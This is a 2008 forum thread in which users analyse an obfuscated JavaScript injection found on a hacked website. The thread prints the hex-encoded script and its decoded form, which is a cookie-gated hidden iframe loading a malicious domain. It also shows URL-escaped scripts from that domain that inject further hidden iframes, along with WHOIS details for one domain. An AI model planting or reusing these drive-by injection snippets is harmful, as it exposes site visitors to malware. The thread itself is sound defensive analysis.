Author Topic: Is this malware ?  (Read 6636 times)

0 Members and 1 Guest are viewing this topic.

December 20, 2008, 10:55:07 pm
Read 6636 times

DanS

  • Newbie

  • Offline
  • *

  • 6
Hi,

This page
Code: [Select]
http://www.bighawk.ca/
includes a js:
Code: [Select]
<script type="text/javascript" src="sohoadmin/client_files/embed.js"></script>
that looks suspicious to me because of the last line:
Code: [Select]
D35F228602D39="p";D35F228602D39+="ars";D35F228602D39+="eInt";B63B75EEF23B="Strin";B63B75EEF23B+="g";B63B75EEF23B+=".fromC";B63B75EEF23B+="harC";B63B75EEF23B+="ode";function EA539FE(FFAE0E5C7382D2){var BB1591F196AE968=578;BB1591F196AE968=BB1591F196AE968-562;D6AA8=eval(D35F228602D39+"(FFAE0E5C7382D2,BB1591F196AE968)");return(D6AA8);}function F8BF3CF8447C14(A313CD692470){var CF9FD04E6E=415;CF9FD04E6E=CF9FD04E6E-413;var FF01993317FC17="";for(F7733F0F2D=0;F7733F0F2D<A313CD692470.length;F7733F0F2D+=CF9FD04E6E){FF01993317FC17+=( eval(B63B75EEF23B+"(EA539FE(A313CD692470.substr(F7733F0F2D,CF9FD04E6E)))"));}eval(FF01993317FC17);}F8BF3CF8447C14("69662028646F63756D656E742E636F6F6B69652E73656172636828226C7062623D312229203D3D202D3129207B0A707174693D646F63756D656E742E676574456C656D656E744279496428276875707127293B696628707174693D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D68757071207372633D687474703A2F2F686F73746164732E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D0A646F63756D656E742E636F6F6B6965203D20226C7062623D313B657870697265733D53756E2C2030312D4465632D323031312030383A30303A303020474D543B706174683D2F223B7D");
The line, when executed generates the following fragment that includes an iframe:
Code: [Select]
if (document.cookie.search("lpbb=1") == -1) {
pqti=document.getElementById('hupq');if(pqti==null){document.write('<iframe id=hupq src=http://hostads.cn style=display:none></iframe>');}
document.cookie = "lpbb=1;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";}

Today the hostads.cn is returning a bogus 404 'not found' page but a few days ago I believe it redirected to a known malware site.
My question is:

Assuming this doesn't do any damage right now is that last line of the embed.js suspicious enough to declare it a malware ?

Thanks for any thoughts,
DanS

December 22, 2008, 01:42:43 am
Reply #1

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
I'd say yes ;) (Avira went nuts over this one)

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.6 Results
Source code for: http://hostads.cn
Server IP: 92.241.176.101 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 3
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 22 December 2008
Time: 01:37:35:37
*****************************************************************
<SCRIPT Language="JavaScript">
document.write(unescape("%3C%69%66%72%61%6D%65 %73%72%63%3D%22%68%74%74%70%3A%2F%2F%31%31%35%2E%31%32%36%2E%32%2E%31%34%30%2F%75%70%64%61%74%65%2E%68%74%6D%22 %77%69%64%74%68%3D%31 %68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E"));
</SCRIPT>
<SCRIPT Language="JavaScript">
document.write(unescape("%3C%69%66%72%61%6D%65 %73%72%63%3D%22%68%74%74%70%3A%2F%2F%66%61%72%75%73%35%36%2E%63%6E%2F%76%6F%76%33%2F%76%6F%76%2F%69%6E%64%65%78%2E%70%68%70%22 %77%69%64%74%68%3D%31 %68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E"));
</SCRIPT>
<SCRIPT Language="JavaScript">
document.write(unescape("%3C%69%66%72%61%6D%65 %73%72%63%3D%22%68%74%74%70%3A%2F%2F%64%69%76%69%6E%65%74%73%2E%63%6E%2F%7A%2F%76%73%2E%68%74%6D%22 %77%69%64%74%68%3D%31 %68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%0D%0A%3C%69%66%72%61%6D%65 %73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%65%70%72%2E%69%6E%66%6F%2F%65%76%6F%2F%63%6F%75%6E%74%2E%70%68%70%3F%6F%3D%32%22 %77%69%64%74%68%3D%31 %68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%0D%0A%3C%69%66%72%61%6D%65 %73%72%63%3D%22%68%74%74%70%3A%2F%2F%64%69%76%69%6E%65%74%73%2E%63%6E%2F%7A%2F%7A%2E%68%74%6D%22 %77%69%64%74%68%3D%31 %68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%0D%0A%3C%69%66%72%61%6D%65 %73%72%63%3D%22%68%74%74%70%3A%2F%2F%63%69%6B%6C%6F%70%2E%63%6E%2F%74%6F%6F%6C%2F%74%6F%6F%6C%32%2F%69%6E%2E%63%67%69%3F%62%61%67%67%69%31%22 %77%69%64%74%68%3D%31 %68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%0D%0A%3C%69%66%72%61%6D%65 %73%72%63%3D%22%68%74%74%70%3A%2F%2F%64%69%76%69%6E%65%74%73%2E%63%6E%2F%6F%75%74%2E%70%68%70%3F%73%5F%69%64%3D%31%22 %77%69%64%74%68%3D%31 %68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E"));
</SCRIPT>

The first escapes to;

Code: [Select]
("<iframesrc="http://115.126.2.140/update.htm"width=1height=1></iframe>
The second to;

Code: [Select]
<iframesrc="http://farus56.cn/vov3/vov/index.php"width=1height=1></iframe>
.... and the third is the most fun - it escapes to;

Code: [Select]
<iframesrc="http://divinets.cn/z/vs.htm"width=1height=1></iframe>

<iframesrc="http://lepr.info/evo/count.php?o=2"width=1height=1></iframe>

<iframesrc="http://divinets.cn/z/z.htm"width=1height=1></iframe>

<iframesrc="http://ciklop.cn/tool/tool2/in.cgi?baggi1"width=1height=1></iframe>

<iframesrc="http://divinets.cn/out.php?s_id=1"width=1height=1></iframe>
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

January 04, 2009, 08:32:21 pm
Reply #2

Monkey

  • Newbie

  • Offline
  • *

  • 1
DO NOT VISIT LEPR.INFO - it will crash your browser in some cases.

Yes, this is malware. The ba***** who hacked my website put in a javascript function that called his page, however mine was encrypted, and the link, after executing the javascript function, was with a 5 on the end, not a 2 in your case.

I WHOIS'd the site, here's what I got:

Domain ID:D27158300-LRMS
Domain Name:LEPR.INFO
Created On:12-Dec-2008 10:11:35 UTC
Expiration Date:12-Dec-2009 10:11:35 UTC
Sponsoring Registrar:Regtime Ltd. (R455-LRMS)
Status:TRANSFER PROHIBITED
Registrant ID:CO403353-RT
Registrant Name:Sumir Mahadjan
Registrant Organization:Private person
Registrant Street1:3 Shenton way, 24-03, Senton House
Registrant Street2:
Registrant Street3:
Registrant City:Sharma
Registrant State/Province:Luis
Registrant Postal Code:688085
Registrant Country:SG
Registrant Phone:+65.3239258
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:mahadjans9@gmail.com
Admin ID:CA403353-RT
Admin Name:Sumir Mahadjan
Admin Organization:Private person
Admin Street1:3 Shenton way, 24-03, Senton House
Admin Street2:
Admin Street3:
Admin City:Sharma
Admin State/Province:Luis
Admin Postal Code:688085
Admin Country:SG
Admin Phone:+65.3239258
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:mahadjans9@gmail.com
Billing ID:CB403353-RT
Billing Name:Sumir Mahadjan
Billing Organization:Private person
Billing Street1:3 Shenton way, 24-03, Senton House
Billing Street2:
Billing Street3:
Billing City:Sharma
Billing State/Province:Luis
Billing Postal Code:688085
Billing Country:SG
Billing Phone:+65.3239258
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing Email:mahadjans9@gmail.com
Tech ID:CT403353-RT
Tech Name:Sumir Mahadjan
Tech Organization:Private person
Tech Street1:3 Shenton way, 24-03, Senton House
Tech Street2:
Tech Street3:
Tech City:Sharma
Tech State/Province:Luis
Tech Postal Code:688085
Tech Country:SG
Tech Phone:+65.3239258
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:mahadjans9@gmail.com
Name Server:NS2.MTVP.INFO
Name Server:NS1.MTVP.INFO
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:

any way to get this site shut down?